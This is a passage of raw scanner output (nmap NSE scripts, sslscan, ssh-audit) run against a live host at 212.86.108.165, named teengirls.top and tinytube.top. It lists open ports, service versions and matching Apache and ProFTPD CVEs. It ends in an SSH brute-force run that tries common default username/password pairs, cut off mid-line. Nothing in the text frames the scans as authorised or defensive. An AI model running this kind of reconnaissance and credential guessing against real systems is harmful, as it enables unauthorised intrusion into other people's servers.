|_ Supported Methods: GET HEAD POST OPTIONS |_http-mobileversion-checker: No mobile version detected. | http-php-version: Logo query returned unknown hash f1195eef46145b7cd54d614384a1fc81 |_Credits query returned unknown hash 2e623918a52af1fb2385252f9018a833 |_http-security-headers: |_http-server-header: Apache/2.4.25 (Debian) | http-sitemap-generator: | Directory structure: | / | Other: 1; php: 1 | /css/ | css: 1 | /icon/ | png: 7 | /images/ | jpg: 4 | /images/big/ | Other: 1 | Longest directory structure: | Depth: 2 | Dir: /images/big/ | Total files found (by extension): |_ Other: 2; css: 1; jpg: 4; php: 1; png: 7 |_http-title: Teen Nude Girls | http-vhosts: |_127 names had status 200 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit= for deeper analysis) |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php |_http-xssed: No previously reported XSS vuln. | vulners: | cpe:/a:apache:http_server:2.4.25: | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679 | CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668 | CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169 | CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167 | CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 | CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 | CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082 | CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788 | CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 | CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 | CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 | CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 | CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 | CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081 | CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 | CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196 | CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 | CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333 | CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798 | CVE-2017-7659 5.0 https://vulners.com/cve/CVE-2017-7659 | CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 | CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197 | CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 | CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 | CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763 |_ CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 NSE: Script Post-scanning. Initiating NSE at 00:09 Completed NSE at 00:09, 0.00s elapsed Initiating NSE at 00:09 Completed NSE at 00:09, 0.00s elapsed ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:09 EDT NSE: Loaded 49 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:09 Completed NSE at 00:09, 0.00s elapsed Initiating NSE at 00:09 Completed NSE at 00:09, 0.00s elapsed Initiating Ping Scan at 00:09 Scanning teengirls.top (212.86.108.165) [4 ports] Completed Ping Scan at 00:09, 0.21s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 00:09 Completed Parallel DNS resolution of 1 host. at 00:09, 0.05s elapsed Initiating SYN Stealth Scan at 00:09 Scanning teengirls.top (212.86.108.165) [1 port] Discovered open port 110/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:09, 0.20s elapsed (1 total ports) Initiating Service scan at 00:09 Scanning 1 service on teengirls.top (212.86.108.165) Completed Service scan at 00:09, 0.36s elapsed (1 service on 1 host) Initiating OS detection (try #1) against teengirls.top (212.86.108.165) Retrying OS detection (try #2) against teengirls.top (212.86.108.165) Initiating Traceroute at 00:09 Completed Traceroute at 00:09, 3.01s elapsed Initiating Parallel DNS resolution of 8 hosts. at 00:09 Completed Parallel DNS resolution of 8 hosts. at 00:09, 0.92s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:09 NSE Timing: About 68.66% done; ETC: 00:11 (0:00:30 remaining) Completed NSE at 00:11, 90.95s elapsed Initiating NSE at 00:11 Completed NSE at 00:11, 0.05s elapsed Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE VERSION 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: USER UIDL CAPA STLS PIPELINING TOP AUTH-RESP-CODE SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) RESP-CODES Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.8 - 3.11 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.415 days (since Wed Aug 26 14:13:37 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 50.70 ms 10.203.8.1 2 56.29 ms unn-185-152-66-238.datapacket.com (185.152.66.238) 3 56.67 ms 165.254.21.49 4 56.66 ms ae-3.r23.atlnga05.us.bb.gin.ntt.net (129.250.5.209) 5 ... 6 7 149.24 ms ae-2.r25.amstnl02.nl.bb.gin.ntt.net (129.250.6.163) 8 156.44 ms ae-1.r04.amstnl02.nl.bb.gin.ntt.net (129.250.3.105) 9 156.48 ms ce-0-4-0-2.r04.amstnl02.nl.ce.gin.ntt.net (128.241.6.7) 10 ... 11 158.07 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:11 Completed NSE at 00:11, 0.00s elapsed Initiating NSE at 00:11 Completed NSE at 00:11, 0.00s elapsed ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:11 EDT NSE: Loaded 48 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:11 Completed NSE at 00:11, 0.00s elapsed Initiating NSE at 00:11 Completed NSE at 00:11, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:11 Completed Parallel DNS resolution of 1 host. at 00:11, 0.05s elapsed Initiating UDP Scan at 00:11 Scanning teengirls.top (212.86.108.165) [1 port] Discovered open port 123/udp on 212.86.108.165 Completed UDP Scan at 00:11, 0.20s elapsed (1 total ports) Initiating Service scan at 00:11 Scanning 1 service on teengirls.top (212.86.108.165) Completed Service scan at 00:11, 0.17s elapsed (1 service on 1 host) Initiating OS detection (try #1) against teengirls.top (212.86.108.165) Retrying OS detection (try #2) against teengirls.top (212.86.108.165) Initiating Traceroute at 00:11 Completed Traceroute at 00:11, 6.02s elapsed Initiating Parallel DNS resolution of 9 hosts. at 00:11 Completed Parallel DNS resolution of 9 hosts. at 00:11, 1.33s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:11 Completed NSE at 00:11, 20.54s elapsed Initiating NSE at 00:11 Completed NSE at 00:11, 0.00s elapsed Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE VERSION 123/udp open ntp NTP v4 (unsynchronized) Too many fingerprints match this host to give specific OS details Network Distance: 20 hops TRACEROUTE (using port 123/udp) HOP RTT ADDRESS 1 72.02 ms 10.203.8.1 2 53.97 ms unn-185-152-66-238.datapacket.com (185.152.66.238) 3 54.32 ms 165.254.21.49 4 60.37 ms ae-3.r23.atlnga05.us.bb.gin.ntt.net (129.250.5.209) 5 ... 6 7 156.99 ms ae-2.r25.amstnl02.nl.bb.gin.ntt.net (129.250.6.163) 8 158.65 ms ae-1.r04.amstnl02.nl.bb.gin.ntt.net (129.250.3.105) 9 154.09 ms ce-0-4-0-2.r04.amstnl02.nl.ce.gin.ntt.net (128.241.6.7) 10 197.17 ms Vlanif711.zar-dcd.cust.novoserve.com (89.105.192.233) 11 ... 19 20 153.63 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:11 Completed NSE at 00:11, 0.00s elapsed Initiating NSE at 00:11 Completed NSE at 00:11, 0.00s elapsed ##################################################################################################################################### HTTP/1.1 200 OK Date: Thu, 27 Aug 2020 04:11:45 GMT Server: Apache/2.4.25 (Debian) Strict-Transport-Security: max-age=31536000; preload Content-Type: text/html; charset=UTF-8 ##################################################################################################################################### #!/back https://fonts.googleapis.com/css?family=Boogaloo&display=swap http://tds.hdkino.top/M6R18w http://trade.tinytube.top/ text/css text/javascript wx/out.php wx/out.php?link=free_download wx/out.php?link=mpeg_11 wx/out.php?link=mpeg_12 wx/out.php?link=mpeg_13 wx/out.php?link=mpeg_14 wx/out.php?link=mpeg_5 wx/out.php?link=mpeg_7 wx/out.php?link=mpeg_8 #################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:12 EDT NSE: Loaded 159 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:12 Completed NSE at 00:12, 0.00s elapsed Initiating NSE at 00:12 Completed NSE at 00:12, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:12 Completed Parallel DNS resolution of 1 host. at 00:12, 0.06s elapsed Initiating SYN Stealth Scan at 00:12 Scanning teengirls.top (212.86.108.165) [1 port] Discovered open port 443/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:12, 0.24s elapsed (1 total ports) Initiating Service scan at 00:12 Scanning 1 service on teengirls.top (212.86.108.165) Completed Service scan at 00:12, 13.63s elapsed (1 service on 1 host) NSE: Script scanning 212.86.108.165. Initiating NSE at 00:12 Completed NSE at 00:13, 91.01s elapsed Initiating NSE at 00:13 Completed NSE at 00:14, 3.17s elapsed Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.17s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE VERSION 443/tcp open ssl/ssl Apache httpd (SSL-only mode) | http-brute: |_ Path "/" does not require authentication |_http-chrono: Request times for /; avg: 2975.48ms; min: 1631.42ms; max: 6421.94ms |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-date: Thu, 27 Aug 2020 04:12:48 GMT; -3s from local time. |_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number= for deeper analysis) |_http-errors: Couldn't find any error pages. |_http-feed: Couldn't find any feeds. |_http-fetch: Please enter the complete path of the directory to save data in. | http-headers: | Date: Thu, 27 Aug 2020 04:12:44 GMT | Server: Apache/2.4.25 (Debian) | Strict-Transport-Security: max-age=31536000; preload | Connection: close | Content-Type: text/html; charset=UTF-8 | |_ (Request type: HEAD) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-mobileversion-checker: No mobile version detected. | http-php-version: Logo query returned unknown hash bdd5fa94d8aa3b284bb5352e5e95048f |_Credits query returned unknown hash 68614e68e4c28e7475559a4b26064ea6 | http-security-headers: | Strict_Transport_Security: |_ Header: Strict-Transport-Security: max-age=31536000; preload |_http-server-header: Apache/2.4.25 (Debian) | http-sitemap-generator: | Directory structure: | / | Other: 1; ico: 1 | Longest directory structure: | Depth: 0 | Dir: / | Total files found (by extension): |_ Other: 1; ico: 1 |_http-title: Cum 4K | http-vhosts: | 12 names had status 400 |_115 names had status 200 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit= for deeper analysis) |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php |_http-xssed: No previously reported XSS vuln. NSE: Script Post-scanning. Initiating NSE at 00:14 Completed NSE at 00:14, 0.00s elapsed Initiating NSE at 00:14 Completed NSE at 00:14, 0.00s elapsed #################################################################################################################################### Version: 2.0.0-static OpenSSL 1.1.1h-dev xx XXX xxxx Connected to 212.86.108.165 Testing SSL server teengirls.top on port 443 using SNI name teengirls.top SSL/TLS Protocols: SSLv2 disabled SSLv3 disabled TLSv1.0 enabled TLSv1.1 enabled TLSv1.2 enabled TLSv1.3 disabled TLS Fallback SCSV: Server supports TLS Fallback SCSV TLS renegotiation: Secure session renegotiation supported TLS Compression: Compression disabled Heartbleed: TLSv1.2 not vulnerable to heartbleed TLSv1.1 not vulnerable to heartbleed TLSv1.0 not vulnerable to heartbleed Supported Server Cipher(s): Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits AES256-GCM-SHA384 Accepted TLSv1.2 256 bits AES256-SHA256 Accepted TLSv1.2 256 bits AES256-SHA Accepted TLSv1.2 128 bits AES128-GCM-SHA256 Accepted TLSv1.2 128 bits AES128-SHA256 Accepted TLSv1.2 128 bits AES128-SHA Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits AES256-SHA Accepted TLSv1.1 128 bits AES128-SHA Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits AES256-SHA Accepted TLSv1.0 128 bits AES128-SHA Server Key Exchange Group(s): TLSv1.2 141 bits sect283k1 TLSv1.2 141 bits sect283r1 TLSv1.2 204 bits sect409k1 TLSv1.2 204 bits sect409r1 TLSv1.2 285 bits sect571k1 TLSv1.2 285 bits sect571r1 TLSv1.2 128 bits secp256k1 TLSv1.2 128 bits secp256r1 (NIST P-256) TLSv1.2 192 bits secp384r1 (NIST P-384) TLSv1.2 260 bits secp521r1 (NIST P-521) TLSv1.2 128 bits brainpoolP256r1 TLSv1.2 192 bits brainpoolP384r1 TLSv1.2 256 bits brainpoolP512r1 Server Signature Algorithm(s): TLSv1.2 rsa_pkcs1_sha1 TLSv1.2 dsa_sha1 TLSv1.2 ecdsa_sha1 TLSv1.2 rsa_pkcs1_sha224 TLSv1.2 dsa_sha224 TLSv1.2 ecdsa_sha224 TLSv1.2 rsa_pkcs1_sha256 TLSv1.2 dsa_sha256 TLSv1.2 ecdsa_secp256r1_sha256 TLSv1.2 rsa_pkcs1_sha384 TLSv1.2 dsa_sha384 TLSv1.2 ecdsa_secp384r1_sha384 TLSv1.2 rsa_pkcs1_sha512 TLSv1.2 dsa_sha512 TLSv1.2 ecdsa_secp521r1_sha512 SSL Certificate: Signature Algorithm: sha256WithRSAEncryption RSA Key Strength: 2048 Subject: cum4k.xyz Issuer: cum4k.xyz Not valid before: Dec 29 16:48:29 2019 GMT Not valid after: Dec 28 16:48:29 2020 GMT ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:41 EDT Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.14s latency). Not shown: 484 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 143/tcp open imap 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:41 EDT Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.13s latency). Not shown: 13 closed ports PORT STATE SERVICE 53/udp open domain 123/udp open ntp Nmap done: 1 IP address (1 host up) scanned in 7.90 seconds #################################################################################################################################### https://212.86.108.165 http://212.86.108.165 {"site":"https://212.86.108.165","status_code":200,"server":"Apache/2.4.25 (Debian)","content_type":"text/html; charset=UTF-8","location":""} {"site":"http://212.86.108.165","status_code":200,"server":"Apache/2.4.25 (Debian)","content_type":"text/html","location":""} ###################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:42 EDT NSE: Loaded 54 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:42 Completed NSE at 00:42, 0.00s elapsed Initiating NSE at 00:42 Completed NSE at 00:42, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:42 Completed Parallel DNS resolution of 1 host. at 00:42, 0.04s elapsed Initiating SYN Stealth Scan at 00:42 Scanning tinytube.top (212.86.108.165) [1 port] Discovered open port 21/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:42, 0.18s elapsed (1 total ports) Initiating Service scan at 00:42 Scanning 1 service on tinytube.top (212.86.108.165) Completed Service scan at 00:42, 0.29s elapsed (1 service on 1 host) Initiating OS detection (try #1) against tinytube.top (212.86.108.165) Retrying OS detection (try #2) against tinytube.top (212.86.108.165) Initiating Traceroute at 00:42 Completed Traceroute at 00:42, 3.01s elapsed Initiating Parallel DNS resolution of 10 hosts. at 00:42 Completed Parallel DNS resolution of 10 hosts. at 00:42, 0.65s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:42 NSE Timing: About 70.83% done; ETC: 00:44 (0:00:30 remaining) Completed NSE at 00:43, 90.90s elapsed Initiating NSE at 00:43 Completed NSE at 00:43, 0.05s elapsed Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.13s latency). PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b | vulners: | cpe:/a:proftpd:proftpd:1.3.5b: | CVE-2019-19272 5.0 https://vulners.com/cve/CVE-2019-19272 |_ CVE-2019-19271 5.0 https://vulners.com/cve/CVE-2019-19271 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.16 (94%), Linux 3.18 (94%), HP P2000 G3 NAS device (93%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.438 days (since Wed Aug 26 14:13:37 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=251 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Unix TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 32.82 ms 10.203.11.1 2 38.14 ms v131.ce05.wdc-02.us.leaseweb.net (207.244.84.156) 3 38.17 ms edm-023.yelaiyehao.com (173.208.126.24) 4 39.35 ms ash-b1-link.telia.net (62.115.182.182) 5 38.82 ms ash-bb2-link.telia.net (62.115.143.120) 6 130.72 ms prs-bb3-link.telia.net (62.115.112.243) 7 128.53 ms adm-bb3-link.telia.net (213.155.136.20) 8 127.71 ms adm-b6-link.telia.net (62.115.117.115) 9 126.32 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 10 ... 11 128.36 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:43 Completed NSE at 00:43, 0.00s elapsed Initiating NSE at 00:43 Completed NSE at 00:43, 0.00s elapsed ##################################################################################################################################### # general (gen) banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7 (gen) software: OpenSSH 7.4p1 (gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+ (gen) compression: enabled (zlib@openssh.com) # key exchange algorithms (kex) curve25519-sha256 -- [warn] unknown algorithm (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak) `- [info] available since OpenSSH 4.4 (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3 (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73 (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53 # host-key algorithms (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28 (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2 (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2 (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves `- [warn] using weak random number generator could reveal the key `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (key) ssh-ed25519 -- [info] available since OpenSSH 6.5 # encryption algorithms (ciphers) (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5 `- [info] default cipher since OpenSSH 6.9. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes192-ctr -- [info] available since OpenSSH 3.7 (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2 (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2 # message authentication code algorithms (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size `- [info] available since OpenSSH 6.2 (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2 (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 6.2 (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode `- [warn] using small 64-bit tag size `- [info] available since OpenSSH 4.7 (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 6.2 (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28 # algorithm recommendations (for OpenSSH 7.4) (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove (rec) -hmac-sha2-512 -- mac algorithm to remove (rec) -umac-128@openssh.com -- mac algorithm to remove (rec) -hmac-sha2-256 -- mac algorithm to remove (rec) -umac-64@openssh.com -- mac algorithm to remove (rec) -hmac-sha1 -- mac algorithm to remove (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove (rec) -umac-64-etm@openssh.com -- mac algorithm to remove ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:44 EDT NSE: Loaded 51 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:44 Completed NSE at 00:44, 0.00s elapsed Initiating NSE at 00:44 Completed NSE at 00:44, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:44 Completed Parallel DNS resolution of 1 host. at 00:44, 0.03s elapsed Initiating SYN Stealth Scan at 00:44 Scanning tinytube.top (212.86.108.165) [1 port] Discovered open port 22/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:44, 0.17s elapsed (1 total ports) Initiating Service scan at 00:44 Scanning 1 service on tinytube.top (212.86.108.165) Completed Service scan at 00:44, 0.33s elapsed (1 service on 1 host) Initiating OS detection (try #1) against tinytube.top (212.86.108.165) Retrying OS detection (try #2) against tinytube.top (212.86.108.165) Initiating Traceroute at 00:44 Completed Traceroute at 00:44, 3.01s elapsed Initiating Parallel DNS resolution of 10 hosts. at 00:44 Completed Parallel DNS resolution of 10 hosts. at 00:44, 0.48s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:44 NSE: [ssh-run 212.86.108.165:22] Failed to specify credentials and command to run. NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:root NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:admin NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:administrator NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:webadmin NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:sysadmin NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:netadmin NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:guest NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:user NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:web NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:test NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test: NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:123456 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:12345 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:123456789 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:password NSE: [ssh-brute 